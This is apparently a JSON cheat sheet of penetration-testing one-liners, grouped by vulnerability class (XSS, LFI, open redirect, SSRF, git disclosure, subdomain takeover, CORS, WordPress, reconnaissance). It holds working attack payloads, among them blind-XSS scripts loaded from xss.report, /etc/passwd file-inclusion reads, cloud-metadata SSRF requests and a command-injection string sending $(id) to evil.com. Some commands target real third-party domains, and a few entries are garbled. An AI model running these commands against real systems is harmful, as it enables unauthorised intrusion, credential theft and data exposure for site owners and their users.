| [ |
| { |
| "category": "Additional Tools", |
| "description": "Additional tools are a set of supporting tools used to automate workflows, analyze results, and extend testing across multiple phases of penetration testing. These include tools for list manipulation (such as anew, uro, and unfurl), tools for rapid scanning (such as httpx-toolkit and dnsx), and tools specialized for specific tasks (such as arjun for parameters, kxss for XSS, and openredirex for redirection). They are typically used within pipelines to link tools together and filter results.", |
| "commands": [ |
| {"id": 1, "description": "HTML Content Filtering - Filter HTML content from discovered URLs", "command": "echo example.com | gau | grep -Eo '(\\/[^\\/]+)\\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml+xml'"}, |
| {"id": 2, "description": "JavaScript Content Filtering - Filter JavaScript files from discovered URLs", "command": "echo example.com | gau | grep '\\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'"}, |
| {"id": 3, "description": "Extract IP Addresses - Extract IP addresses from text files", "command": "grep -oE \"\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b\" file.txt"}, |
| {"id": 4, "description": "Process Amass Output - Process Amass output to extract clean domains", "command": "cat domains.txt | cut -d']' -f2 | awk '{print $2}' | tr ',' '\\n' | sort -u > amass.txt"}, |
| {"id": 5, "description": "Filter Dynamic Files - Filter URLs for dynamic files with parameters", "command": "cat urls.txt | grep -E \".php|.asp|.aspx|.jspx|.jsp\" | grep '=' | sort > output.txt"}, |
| {"id": 6, "description": "Clean Parameters - Clean parameter values from URLs", "command": "cat output.txt | sed 's/=.*/=/' > final.txt"}, |
| {"id": 7, "description": "URO Deduplication - Remove duplicate URLs using URO", "command": "cat urls.txt | uro | sort -u > deduplicated_urls.txt"}, |
| {"id": 8, "description": "QSReplace Parameter Testing - Replace parameter values with FUZZ for testing", "command": "cat urls.txt | qsreplace \"FUZZ\" | sort -u > fuzz_urls.txt"} |
| ] |
| }, |
| { |
| "category": "XSS Testing", |
| "description": "Cross-site scripting (XSS) testing is the process of discovering whether an application allows the injection of malicious JavaScript code into web pages, which could lead to session theft, account hijacking, or redirecting users to malicious websites. XSS is divided into three main types: stored, reflected, and DOM-based.", |
| "commands": [ |
| {"id": 1, "description": "Reflected XSS for Multiple Payload - Comprehensive reflected XSS testing with multiple payloads", "command": "subfinder -d \"example.com\" -all -recursive | httpx -mc 200 -silent | sed -E 's,https?://(www\\.)?,' | anew | urlfinder -all | iconv -f ISO-8859-1 -t UTF-8 -c | grep -aE '\\?.*=.*(&.*)?' | grep -aiEv \"\\.(css|ico|woff|woff2|svg|ttf|eot|png|jpg|jpeg|js|json|pdf|gif|xml|webp)($|\\s|\\?|&|#|/|\\.)\" | awk -F'[?&=]' '!seen[$1$2]++' | anew | rc -p \"RXSS\" -o rxss.txt"}, |
| {"id": 2, "description": "Blind XSS Oneliners - Blind XSS testing with specialized payloads", "command": "subfinder -d \"vulnweb.com\" -all -recursive | httpx -mc 200 -silent | sed -E 's,https?://(www\\.)?,' | anew | urlfinder -all | iconv -f ISO-8859-1 -t UTF-8 -c | grep -aE '\\?.*=.*(&.*)?' | anew > bxss.txt;xsser -f bxss.txt -p /home/haxshadow/Xss-payload/blindXss.txt"}, |
| {"id": 3, "description": "RXSS/BXSS Both finder - Comprehensive RXSS and BXSS detection pipeline", "command": "sudo mkdir -p --mode=777 all_xss/example.com/RXSS_BXSS;urlfinder -d \"example.com\" -all | iconv -f ISO-8859-1 -t UTF-8 -c | anew>all_xss/example.com/RXSS_BXSS/all_urls.txt"}, |
| {"id": 4, "description": "Final exploitation with Loxs tool", "command": "echo example.com | gau | gf xss | uro | Gxss | kxss | tee xss_output.txt"}, |
| {"id": 5, "description": "XSS Hunting from WaybackURLS", "command": "waybackurls wallet.tg | grep -E '\\bhttps?://\\S+?=\\S+' | grep -E '\\.php|\\.asp' | sort -u | sed 's/\\(=[^&]*\\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss"}, |
| {"id": 6, "description": "XSS automation workflow with subfinder+httpx+katana+dalfox", "command": "subfinder -d example.com -o subdomains.txt && httpx -l subdomains.txt -o httpx.txt && echo \"example.com\" | gau --threads 5 >> Enpoints.txt && cat httpx.txt | katana -jc >> Enpoints.txt && cat Enpoints.txt | uro >> Endpoints_F.txt && cat Endpoints_F.txt | gf xss >> XSS.txt && cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt && dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt"}, |
| {"id": 7, "description": "Poisoning the cache with XSS", "command": "curl -H \"User-Agent: tester\" -H \"hidden-header: </script><h2>TESTERING2333<img src=x onerror=alert(document.domain)>\" example.com"}, |
| {"id": 8, "description": "Find hidden parameters and potential XSS using Arjun + KXSS", "command": "arjun -q -u example.com arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, \"=\"); print baseUrl \"?\" param[1] \"=\"}}' | kxss"}, |
| {"id": 9, "description": "XSS is a hidden parameter in JavaScript", "command": "assetfinder example.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,var,\"$url\"?,g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e \"\\e[1;33m$url\\n\\e[1;32m$vars\"; done"}, |
| {"id": 16, "description": "Detect XSS vulnerabilities combining Arjun and kxss", "command": "arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, \"=\"); print baseUrl \"?\" param[1] \"=\"}}' | kxss"}, |
| {"id": 17, "description": "Head-based blind XSS testing", "command": "subfinder -d example.com | gau | bxss -payload ''><script src=https://xss.report/c/coffinxp></script>' -header 'X-Forwarded-For'"}, |
| {"id": 18, "description": "Check XSS on all URLs", "command": "echo 'example.com' | gau | qsreplace '<sCript>confirm(1)</sCript>' | xsschecker -match '<sCript>confirm(1)</sCript>' -vuln"}, |
| {"id": 19, "description": "Find blind XSS", "command": "subfinder -d example.com | gau | grep '&' | bxss -appendMode -payload ''><script src=https://xss.report/c/coffinxp></script>' -parameters"}, |
| {"id": 22, "description": "Automatically detect XSS across range of domains", "command": "subfinder -dL domainlist1.txt | dnsx | shuf | (gau | hakrawler) | anew | egrep -iv \"\\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|svg|txt|js)$\" | urless | nilo | dalfox pipe -b https://xss.hunter/?q=1"} |
| ] |
| }, |
| { |
| "category": "LFI Testing", |
| "description": "Local File Inclusion (LFI) testing is the process of discovering whether an application allows an attacker to read files from the server's filesystem via path parameters (such as page=, file=, path=). LFI can be exploited to read sensitive files (e.g., /etc/passwd, config.php) or, via wrappers such as php://filter and php://input, to execute code.", |
| "commands": [ |
| {"id": 1, "description": "Basic LFI Test - LFI testing with FFUF and passwd file detection", "command": "echo \"https://example.com/\" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace \"FUZZ\" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr \"root:(x|\\*|\\$[^\\:]*):0:0:\" -v"}, |
| {"id": 2, "description": "LFI with Curl - LFI testing with curl and parallel processing", "command": "gau example.com | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'"}, |
| {"id": 3, "description": "HTTPx LFI Test - LFI testing with httpx", "command": "echo 'https://example.com/index.php?page=' | httpx -paths payloads/lfi.txt -threads 50 -random-agent -mc 200 -mr \"root:(x|\\*|\\$[^\\:]*):0:0:\""}, |
| {"id": 4, "description": "Fast LFI with waymore - changes user agent to bypass WAF", "command": "waymore -i \"testphp.vulnweb.com\" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace \"FUZZ\" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr \"root:\" -v; done"}, |
| {"id": 5, "description": "curl manual testing using path traverse techniques", "command": "curl \"https://target.com/page?file=../../../../etc/passwd\""}, |
| {"id": 6, "description": "ffuf fuzzing using path traversal lists", "command": "ffuf -u \"https://target.com/page?file=FUZZ\" -w lfi-wordlist.txt"}, |
| {"id": 7, "description": "LFISuite - Automatically detect and exploit LFI", "command": "lfisuite.py -u \"https://target.com/page?file=value\""}, |
| {"id": 8, "description": "dotdotpwn - Generate path traversal payloads", "command": "dotdotpwn.pl -m http -u \"https://target.com/page?file=TRAVERSAL\""}, |
| {"id": 9, "description": "nuclei - Templates for detecting LFI", "command": "nuclei -u https://target.com -t ~/nuclei-templates/lfi/"} |
| ] |
| }, |
| { |
| "category": "Open Redirect", |
| "description": "Open redirect testing is the process of discovering whether an application allows users to be redirected to an external domain without proper verification of the destination link. This vulnerability can be exploited in phishing attacks or by bypassing security mechanisms by tricking a victim into clicking a link from a trusted site and then redirecting them to a malicious one.", |
| "commands": [ |
| {"id": 1, "description": "Find Redirect Parameters - Extract URLs with redirect parameters", "command": "cat urls.txt | grep -Pi \"returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|next=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_url=|url=\" | tee redirect_params.txt"}, |
| {"id": 2, "description": "GF Redirect Pattern - Use GF patterns to find redirect parameters", "command": "cat urls.txt | gf redirect | uro | sort -u | tee redirect_params.txt"}, |
| {"id": 3, "description": "Basic Open Redirect Test - Test redirect parameters with evil.com", "command": "cat redirect_params.txt | qsreplace \"https://evil.com\" | httpx -silent -fr -mr \"evil.com\""}, |
| {"id": 4, "description": "Comprehensive Redirect Test - Full pipeline for open redirect testing", "command": "subfinder -d example.com -all | httpx -silent | gau | gf redirect | uro | qsreplace \"https://evil.com\" | httpx -silent -fr -mr \"evil.com\""}, |
| {"id": 6, "description": "ffuf fuzzing to explore SSRF/redirect capabilities", "command": "ffuf -u https://target.com/api?url=FUZZ -w internal-ips.txt"}, |
| {"id": 7, "description": "curl manual testing via insertion of external domains", "command": "curl -i \"https://target.com/redirect?url=https://evil.com\""}, |
| {"id": 8, "description": "openredirex - Specialized tool for detecting open redirects", "command": "openredirex -u https://target.com -p \"url=\" -w payloads.txt"}, |
| {"id": 9, "description": "nuclei - Templates for rapid open redirect detection", "command": "nuclei -u https://target.com -t ~/nuclei-templates/open-redirect/"}, |
| {"id": 17, "description": "Automated sequential discovery of open redirect vulnerabilities", "command": "subfinder -d vulnweb.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace \"https://evil.com\" | httpx-toolkit -silent -fr -mr \"evil.com\""}, |
| {"id": 20, "description": "Fuzzing with FFuF for open redirects", "command": "ffuf -w redirect_params.txt:PARAM -w loxs/payloads/or.txt:PAYLOAD -u \"https://site.com/bitrix/redirect.php?PARAM=PAYLOAD\" -mc 301,302,303,307,308 -t 10 -mr \"Location: http://google.com\""}, |
| {"id": 22, "description": "Nuclei Template for open redirect", "command": "echo subdomains.txt | nuclei -t openRedirect.yaml -c 30"} |
| ] |
| }, |
| { |
| "category": "SSRF Testing", |
| "description": "Server-side request forgery (SSRF) testing is the process of discovering whether an application can be made to issue unrestricted server-side requests to internal or external addresses. This vulnerability allows an attacker to abuse the server to reach internal services (such as AWS metadata, Redis, databases) or bypass firewalls.", |
| "commands": [ |
| {"id": 1, "description": "Find SSRF Parameters - Identify URLs with SSRF-prone parameters", "command": "cat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -u"}, |
| {"id": 2, "description": "Find API/Webhook Patterns - Find API endpoints and webhook integrations", "command": "cat urls.txt | grep -i 'webhook\\|callback\\|upload\\|fetch\\|import\\|api' | sort -u"}, |
| {"id": 3, "description": "Nuclei SSRF Scan - Automated SSRF vulnerability scanning", "command": "cat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/"}, |
| {"id": 4, "description": "Basic SSRF Test - Basic SSRF test to localhost", "command": "curl \"https://example.com/page?url=http://127.0.0.1:80/\""}, |
| {"id": 5, "description": "Cloud Metadata SSRF - Test SSRF against cloud metadata services", "command": "curl \"https://example.com/api?endpoint=http://169.254.169.254/latest/meta-data/\""}, |
| {"id": 6, "description": "ffuf / Burp Intruder - Fuzzing for SSRF capabilities", "command": "ffuf -u https://target.com/api?url=FUZZ -w internal-ips.txt"}, |
| {"id": 7, "description": "SSRFmap - Automatically detect and exploit SSRF", "command": "ssrfmap -r request.txt -p url"}, |
| {"id": 8, "description": "nuclei - SSRF templates for rapid detection", "command": "nuclei -u https://target.com -t ~/nuclei-templates/ssrf/"}, |
| {"id": 9, "description": "SSRF to RCE via Open Redirect - Advanced SSRF with Payload Injection", "command": "curl -X POST http://target.com/api/v1/login -d \"username=admin&password=pass&redirect=http://evil.com$(id)\" -H \"X-Forwarded-Host: 169.254.169.254\" -I"} |
| ] |
| }, |
| { |
| "category": "Git Repository Disclosure", |
| "description": "Git Repository Disclosure is the exposure of a .git folder or version control metadata on a web server, allowing attackers to download the repository and access source code, configuration files, database credentials, or internal logic. This occurs when the web server does not block access to .git/ or misconfigures permissions.", |
| "commands": [ |
| {"id": 1, "description": "Git Directory Discovery - Detect exposed .git directories and directory listings", "command": "cat domains.txt | grep \"SUCCESS\" | gf urls | httpx -sc -server -cl -path \"/.git/\" -mc 200 -location -ms \"Index of\" -probe"}, |
| {"id": 2, "description": "git-dumper - Extract entire repository from publicly exposed .git folder", "command": "git-dumper https://target.com/.git/ ./output"}, |
| {"id": 3, "description": "wget/curl - Manually download .git files", "command": "wget -r https://target.com/.git/"}, |
| {"id": 4, "description": "gobuster/ffuf - Brute-force discovery of .git/", "command": "gobuster dir -u https://target.com -w wordlist.txt -x git"}, |
| {"id": 5, "description": "nmap script - http-git detects exposed git repositories", "command": "nmap -p80 --script http-git target.com"} |
| ] |
| }, |
| { |
| "category": "Subdomain Takeover", |
| "description": "Subdomain takeover testing is the process of discovering subdomains that point to external services (such as GitHub Pages, AWS S3, Heroku, etc.) that are no longer in use, allowing an attacker to claim the service and control the subdomain. This occurs when DNS (CNAME) records point to a non-existent resource.", |
| "commands": [ |
| {"id": 1, "description": "Subdomain Takeover Detection - Automated subdomain takeover detection with SSL verification", "command": "subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl"}, |
| {"id": 2, "description": "nuclei - With subdomain-takeover template for vulnerability detection", "command": "nuclei -l subdomains.txt -t ~/nuclei-templates/takeovers/"}, |
| {"id": 3, "description": "Hybrid Detection with AI-Powered Fingerprinting - Multi-tool takeover detection", "command": "subfinder -d http://target.com -silent | dnsgen - | massdns -r resolvers.txt -t A -o S | grep CNAME | tee cname.txt | subjack -w cname.txt -t 100 -ssl -v -c fingerprints.json -o takeovers.txt"} |
| ] |
| }, |
| { |
| "category": "CORS Testing", |
| "description": "CORS Testing is the process of verifying that a web application's Cross-Origin Resource Sharing (CORS) policy is correctly configured to prevent unauthorized cross-origin requests. Misconfigurations (e.g., Access-Control-Allow-Origin: * or reflecting arbitrary origins) can lead to data leakage, session hijacking, or CSRF attacks.", |
| "commands": [ |
| {"id": 1, "description": "CORS Test with Curl - Test CORS configuration with custom origin", "command": "curl -H \"Origin: http://example.com\" -I https://example.com/wp-json/"}, |
| {"id": 2, "description": "Detailed CORS Analysis - Analyze CORS headers in response", "command": "curl -H \"Origin: http://example.com\" -I https://example.com/wp-json/ | grep -i -e \"access-control-allow-origin\" -e \"access-control-allow-methods\" -e \"access-control-allow-credentials\""}, |
| {"id": 3, "description": "Nuclei CORS Test - Automated CORS vulnerability scanning with Nuclei", "command": "cat subdomains.txt | httpx -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt"} |
| ] |
| }, |
| { |
| "category": "WordPress Security Testing", |
| "description": "WordPress Security Testing is the process of assessing a WordPress website for misconfigurations, outdated components, weak credentials, and known vulnerabilities. It focuses on the unique architecture of WordPress: core, plugins, themes, and user roles.", |
| "commands": [ |
| {"id": 1, "description": "WPScan Full Enumeration - Comprehensive WordPress security scan with aggressive plugin detection", "command": "wpscan --url https://example.com --disable-tls-checks --api-token YOUR_API_TOKEN -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force"}, |
| {"id": 2, "description": "wpscan - Detect version, vulnerabilities, plugins, themes, and users", "command": "wpscan --url https://target.com --enumerate vp,vt,u"}, |
| {"id": 3, "description": "gobuster + WordPress Lists - Brute-force extension (plugin) and theme paths", "command": "gobuster dir -u https://target.com -w /usr/share/wordlists/wpscan/plugins.txt"}, |
| {"id": 4, "description": "ffuf + list - High flexibility in filtering with POST and headers support", "command": "ffuf -u https://target.com/wp-content/plugins/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/WordPress/plugins.fuzz.txt"}, |
| {"id": 5, "description": "nmap NSE scripts - Version enumeration, vulnerability and extension detection", "command": "nmap -p80,443 --script http-wordpress-* -sV target.com"}, |
| {"id": 6, "description": "curl manual - Directly query the REST API users endpoint for user enumeration", "command": "curl -s https://target.com/wp-json/wp/v2/users"} |
| ] |
| }, |
| { |
| "category": "Directory & File Bruteforcing", |
| "description": "Directory & File Bruteforcing is the automated process of enumerating accessible directories and files on a web server by systematically testing thousands of common names, extensions, and patterns. It uncovers hidden endpoints, backup files, administrative interfaces, and developer artifacts that are not linked publicly.", |
| "commands": [ |
| {"id": 1, "description": "Dirsearch Basic - Basic directory and file discovery", "command": "dirsearch -u https://example.com --full-url --deep-recursive -r"}, |
| {"id": 2, "description": "Dirsearch Extended - Extended directory bruteforcing with multiple extensions", "command": "dirsearch -u https://example.com -e php,cgi,htm,html,js,txt,bak,zip,old,conf,log,asp,aspx,jsp,sql,db --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1"}, |
| {"id": 3, "description": "FFUF Directory Discovery - FFUF directory discovery with recursion and multiple extensions", "command": "ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env -ac -c -t 10"}, |
| {"id": 5, "description": "ffuf LFI payload testing", "command": "ffuf -request lfi -request-proto https -w /root/wordlists/offensive\\ payloads/LFI\\ payload.txt -c -mr 'root:'"}, |
| {"id": 6, "description": "Dynamic Parameter Tampering - Fuzzing for API Parameter Manipulation", "command": "ffuf -u \"http://target.com/api/v1/resource?FUZZ=value\" -w /usr/share/wordlists/params.txt -mc 200,403 -t 100 -ac -H \"User-Agent: Mozilla/5.0\" -o tampered_params.txt"} |
| ] |
| }, |
| { |
| "category": "Hidden Parameter Discovery", |
| "description": "Hidden Parameter Discovery is the process of identifying undocumented or concealed HTTP parameters that may affect application behavior, expose security flaws, or unlock hidden functionality. Attackers and testers inject parameters not explicitly defined in forms or API documentation to discover injection points, bypass security controls, or trigger unintended logic.", |
| "commands": [ |
| {"id": 1, "description": "Arjun Passive Discovery - Passive parameter discovery using Arjun", "command": "arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers \"User-Agent: Mozilla/5.0\""}, |
| {"id": 2, "description": "Arjun Active Discovery - Active parameter discovery with wordlist", "command": "arjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers \"User-Agent: Mozilla/5.0\""} |
| ] |
| }, |
| { |
| "category": "Sensitive File Discovery", |
| "description": "Sensitive File Discovery is the process of identifying exposed files on a target system that may contain credentials, configuration data, backup archives, or other confidential information. It often relies on wordlist-based fuzzing, directory brute-forcing, or analyzing public sources to locate files that were unintentionally left accessible.", |
| "commands": [ |
| {"id": 1, "description": "Basic Sensitive Files - Filter URLs for common sensitive file extensions", "command": "cat allurls.txt | grep -E \"\\.xls|\\.xml|\\.xlsx|\\.json|\\.pdf|\\.sql|\\.doc|\\.docx|\\.pptx|\\.txt|\\.zip|\\.tar\\.gz|\\.tgz|\\.bak|\\.7z|\\.rar|\\.log|\\.cache|\\.secret|\\.db|\\.backup|\\.yml|\\.gz|\\.config|\\.csv|\\.yaml|\\.md|\\.md5\""}, |
| {"id": 2, "description": "Extended Sensitive Files - Extended regex for sensitive file discovery", "command": "cat allurls.txt | grep -E \"\\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|p12|pem|key|crt|sh|py|java|env|ini|conf|properties|cfg)$\""}, |
| {"id": 3, "description": "Google Dork for Files - Google search for sensitive files", "command": "site:*.example.com (ext:doc OR ext:docx OR ext:pdf OR ext:rtf OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:log OR ext:bak OR ext:conf OR ext:sql)"} |
| ] |
| }, |
| { |
| "category": "Vulnerability Scanning", |
| "description": "Vulnerability Scanning is the automated process of identifying known weaknesses, misconfigurations, and missing patches in target systems or applications. It follows host discovery and URL collection to detect potential entry points before manual exploitation.", |
| "commands": [ |
| {"id": 1, "description": "Nuclei Single Target - Run Nuclei templates against single target", "command": "nuclei -u https://example.com -bs 50 -c 30"}, |
| {"id": 2, "description": "Nuclei Multiple Targets - Run Nuclei templates against multiple targets", "command": "nuclei -l live_domains.txt -bs 50 -c 30"}, |
| {"id": 3, "description": "Nuclei with Specific Severity - Run only critical and high severity templates", "command": "nuclei -l live_domains.txt -s critical,high -bs 50 -c 30"} |
| ] |
| }, |
| { |
| "category": "URL Collection & Analysis", |
| "description": "URL Collection & Analysis is the process of gathering and examining URLs associated with a target to discover web endpoints, parameters, hidden paths, and exposed resources. It is a crucial phase in web reconnaissance, used to map the attack surface, identify entry points, and collect intelligence for further testing.", |
| "commands": [ |
| {"id": 1, "description": "Katana - Fast web crawler for URL discovery", "command": "katana -u livesubdomains.txt -d 2 -o urls.txt"}, |
| {"id": 2, "description": "Hakrawler - Simple, fast web crawler", "command": "cat urls.txt | hakrawler -u > urls3.txt"}, |
| {"id": 3, "description": "GAU (Get All URLs) - Fetch known URLs from AlienVault OTX, Wayback Machine, and Common Crawl", "command": "cat livesubdomains.txt | gau | sort -u > urls2.txt"}, |
| {"id": 4, "description": "URLFinder - Find URLs from various sources", "command": "urlfinder -d example.com | sort -u > urls3.txt"}, |
| {"id": 5, "description": "GAU with Status Filter - Get URLs with 200 status code and deduplicate", "command": "echo example.com | gau --mc 200 | urldedupe > urls.txt"}, |
| {"id": 6, "description": "Extract URLs with Parameters - Extract URLs containing parameters", "command": "cat allurls.txt | grep '=' | urldedupe | tee output.txt"}, |
| {"id": 7, "description": "Parameter Pattern Matching - Extract URLs with parameter patterns", "command": "cat allurls.txt | grep -E '\\?[^=]+=.+$' | tee output.txt"}, |
| {"id": 8, "description": "GF SQLi Pattern - Filter URLs potentially vulnerable to SQL injection", "command": "cat allurls.txt | gf sqli"} |
| ] |
| }, |
| { |
| "category": "Live Host Discovery", |
| "description": "Live Host Discovery is the process of identifying active (alive) hosts on a network by sending probes (e.g., ICMP, ARP, TCP, UDP) and analyzing responses. It is the first phase of network penetration testing and enumeration, used to map live systems before deeper scanning.", |
| "commands": [ |
| {"id": 1, "description": "HTTPX Basic - Probe for live hosts on multiple ports", "command": "cat subdomain.txt | httpx -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt"}, |
| {"id": 2, "description": "HTTPX with Status Codes - Probe with detailed information extraction", "command": "cat subdomain.txt | httpx -sc -title -server -td -ports 80,443,8080,8000,8888 -threads 200"}, |
| {"id": 3, "description": "Aquatone Basic - Take screenshots of live hosts", "command": "cat hosts.txt | aquatone"}, |
| {"id": 4, "description": "Aquatone Custom Ports - Screenshot with custom port list", "command": "cat hosts.txt | aquatone -ports 80,443,8000,8080,8443"}, |
| {"id": 5, "description": "Aquatone Extended Ports - Screenshot with extended port range", "command": "cat hosts.txt | aquatone -ports 80,81,443,591,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,8443,8834,8888"} |
| ] |
| }, |
| { |
| "category": "Subdomain Enumeration", |
| "description": "Subdomain Enumeration is the process of extracting subdomains associated with a target domain using automated tools, OSINT, DNS brute-forcing, and public sources. It is a foundational recon step that expands the attack surface for further testing.", |
| "commands": [ |
| {"id": 1, "description": "Subfinder - Fast subdomain discovery using multiple data sources", "command": "subfinder -d example.com -all -recursive -o subfinder.txt"}, |
| {"id": 2, "description": "Assetfinder - Find domains and subdomains associated with a given domain", "command": "assetfinder --subs-only example.com > assetfinder.txt"}, |
| {"id": 3, "description": "Sublist3r - Subdomain enumeration using OSINT techniques", "command": "sublist3r -d example.com -e baidu,yahoo,google,bing,ask,netcraft,virustotal,threatcrowd,crtsh,passivedns -v -o sublist3r.txt"}, |
| {"id": 4, "description": "Amass - In-depth attack surface mapping and external asset discovery", "command": "amass enum -passive -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txt"}, |
| {"id": 5, "description": "Certificate Transparency - Find subdomains from SSL certificate transparency logs", "command": "curl -s https://crt.sh\\?q\\=\\example.com\\&output\\=json | jq -r '.[].name_value' | grep -Po '(\\w+\\.\\w+\\.\\w+)$' >crtsh.txt"}, |
| {"id": 6, "description": "Wayback Machine - Historical subdomain discovery from web archives", "command": "curl -s \"http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey\" |sort| sed -e 's_https*://__' -e \"s/\\/.*//' -e 's/:.*//' -e 's/^www\\.//' | sort -u > wayback.txt"}, |
| {"id": 7, "description": "Merge & Deduplicate - Combine and remove duplicate subdomains", "command": "cat *.txt | sort -u > final.txt"}, |
| {"id": 8, "description": "FFUF Subdomain Bruteforce - Brute force subdomain discovery using wordlists", "command": "ffuf -u \"https://FUZZ.example.com\" -w wordlist.txt -mc 200,301,302"}, |
| {"id": 9, "description": "Subdomain Permutation - Generate subdomain permutations and resolve them", "command": "subfinder -d example.com | alterx | dnsx"}, |
| {"id": 10, "description": "Alterx Enrichment - Enrich domain with common patterns", "command": "echo example.com | alterx -enrich | dnsx"}, |
| {"id": 11, "description": "Alterx with Wordlist - Use wordlist for subdomain permutation", "command": "echo example.com | alterx -pp word=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | dnsx"}, |
| {"id": 12, "description": "Hybrid Recon with Multi-Tool Subdomain Discovery and Dynamic Correlation", "command": "subfinder -d walletbot.me -silent; amass enum -passive -d http://imamhussain.org -silent; assetfinder --subs-only http://imamhussain.org) | anew | sort -u | dnsx -a -resp -o resolved.txt | httpx -silent -title -tech-detect -status-code -o httpx_results.txt"}, |
| {"id": 13, "description": "Filter direct subdomains", "command": "cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt"}, |
| {"id": 14, "description": "Fetch negative URLs with katana", "command": "katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt"} |
| ] |
| } |
| ] |